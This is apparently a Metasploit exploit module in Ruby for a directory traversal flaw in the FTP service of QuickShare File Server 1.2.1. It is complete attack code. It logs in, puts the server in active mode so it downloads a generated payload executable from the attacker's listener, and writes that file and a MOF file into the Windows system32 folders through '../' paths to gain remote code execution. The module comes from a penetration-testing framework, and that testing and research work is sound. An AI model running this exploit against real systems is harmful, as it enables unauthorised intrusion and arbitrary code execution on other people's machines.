1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::Ftp
10
  include Msf::Exploit::Remote::TcpServer
11
  include Msf::Exploit::EXE
12
  include Msf::Exploit::WbemExec
13

14
  def initialize(info = {})
15
    super(
16
      update_info(
17
        info,
18
        'Name' => "QuickShare File Server 1.2.1 Directory Traversal Vulnerability",
19
        'Description' => %q{
20
          This module exploits a vulnerability found in QuickShare File Server's FTP
21
          service.  By supplying "../" in the file path, it is possible to trigger a
22
          directory traversal flaw, allowing the attacker to read a file outside the
23
          virtual directory.  By default, the "Writable" option is enabled during account
24
          creation, therefore this makes it possible to create a file at an arbitrary
25
          location, which leads to remote code execution.
26
        },
27
        'License' => MSF_LICENSE,
28
        'Author' => [
29
          'modpr0be', # Discovery, PoC
30
          'sinn3r' # Metasploit
31
        ],
32
        'References' => [
33
          ['CVE', '2011-10010'],
34
          ['OSVDB', '70776'],
35
          ['EDB', '16105'],
36
          ['URL', 'http://www.quicksharehq.com/blog/quickshare-file-server-1-2-2-released.html'],
37
          ['URL', 'http://www.digital-echidna.org/2011/02/quickshare-file-share-1-2-1-directory-traversal-vulnerability/'],
38
          ['ATT&CK', Mitre::Attack::Technique::T1059_COMMAND_AND_SCRIPTING_INTERPRETER],
39
          ['ATT&CK', Mitre::Attack::Technique::T1068_EXPLOITATION_FOR_PRIVILEGE_ESCALATION],
40
          ['ATT&CK', Mitre::Attack::Technique::T1105_INGRESS_TOOL_TRANSFER]
41
        ],
42
        'Payload' => {
43
          'BadChars' => "\x00"
44
        },
45
        'DefaultOptions' => {
46
          'EXITFUNC' => 'thread'
47
        },
48
        'Platform' => 'win',
49
        'Targets' => [
50
          ['QuickShare File Server 1.2.1', {}]
51
        ],
52
        'Stance' => Msf::Exploit::Stance::Aggressive,
53
        'Privileged' => false,
54
        'DisclosureDate' => '2011-02-03',
55
        'DefaultTarget' => 0,
56
        'Notes' => {
57
          'Reliability' => UNKNOWN_RELIABILITY,
58
          'Stability' => UNKNOWN_STABILITY,
59
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
60
        }
61
      )
62
    )
63

64
    register_options(
65
      [
66
        # Change the default description so this option makes sense
67
        OptPort.new('SRVPORT', [true, 'The local port to listen on for active mode', 8080])
68
      ]
69
    )
70
  end
71

72
  def check
73
    connect
74
    disconnect
75

76
    if banner =~ /quickshare ftpd/
77
      return Exploit::CheckCode::Detected
78
    else
79
      return Exploit::CheckCode::Safe
80
    end
81
  end
82

83
  def on_client_connect(cli)
84
    peer = "#{cli.peerhost}:#{cli.peerport}"
85

86
    case @stage
87
    when :exe
88
      print_status("Sending executable (#{@exe.length.to_s} bytes)")
89
      cli.put(@exe)
90
      @stage = :mof
91

92
    when :mof
93
      print_status("Sending MOF (#{@mof.length.to_s} bytes)")
94
      cli.put(@mof)
95
    end
96

97
    cli.close
98
  end
99

100
  def upload(filename)
101
    select(nil, nil, nil, 1)
102

103
    peer = "#{rhost}:#{rport}"
104
    print_status("Trying to upload #{::File.basename(filename)}")
105

106
    # We can't use connect_login, because it cannot determine a successful login correctly.
107
    # For example: The server actually returns a 503 (Bad Sequence of Commands) when the
108
    # user has already authenticated.
109
    conn = connect(false, datastore['VERBOSE'])
110

111
    res = send_user(datastore['FTPUSER'], conn)
112

113
    if res !~ /^(331|2)/
114
      fail_with(Failure::BadConfig, "The server rejected our username: #{res.to_s}")
115
    end
116

117
    res = send_pass(datastore['FTPPASS'], conn)
118
    if res !~ /^(2|503)/
119
      fail_with(Failure::BadConfig, "The server rejected our password: #{res.to_s}")
120
    end
121

122
    # Switch to binary mode
123
    print_status("Set binary mode")
124
    send_cmd(['TYPE', 'I'], true, conn)
125

126
    # Prepare active mode: Get attacker's IP and source port
127
    src_ip = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST']
128
    src_port = datastore['SRVPORT'].to_i
129

130
    # Prepare active mode: Convert the IP and port for active mode
131
    src_ip = src_ip.gsub(/\./, ',')
132
    src_port = "#{src_port / 256},#{src_port.remainder(256)}"
133

134
    # Set to active mode
135
    print_status("Set active mode \"#{src_ip},#{src_port}\"")
136
    send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn)
137

138
    # Tell the FTP server to download our file
139
    send_cmd(['STOR', filename], false, conn)
140

141
    disconnect(conn)
142
  end
143

144
  def exploit
145
    trigger = '../../../../../../../../'
146
    exe_name = "#{trigger}WINDOWS/system32/#{rand_text_alpha(rand(10) + 5)}.exe"
147
    mof_name = "#{trigger}WINDOWS/system32/wbem/mof/#{rand_text_alpha(rand(10) + 5)}.vbs"
148
    @mof = generate_mof(::File.basename(mof_name), ::File.basename(exe_name))
149
    @exe = generate_payload_exe
150
    @stage = :exe
151

152
    begin
153
      t = framework.threads.spawn("reqs", false) {
154
        begin
155
          # Upload our malicious executable
156
          u = upload(exe_name)
157

158
          # Upload the mof file
159
          upload(mof_name) if u
160
        rescue ::Exception => e
161
          print_error e.message
162
          cleanup
163
        end
164
      }
165
      super
166
    ensure
167
      t.kill
168
    end
169
  end
170
end
171

172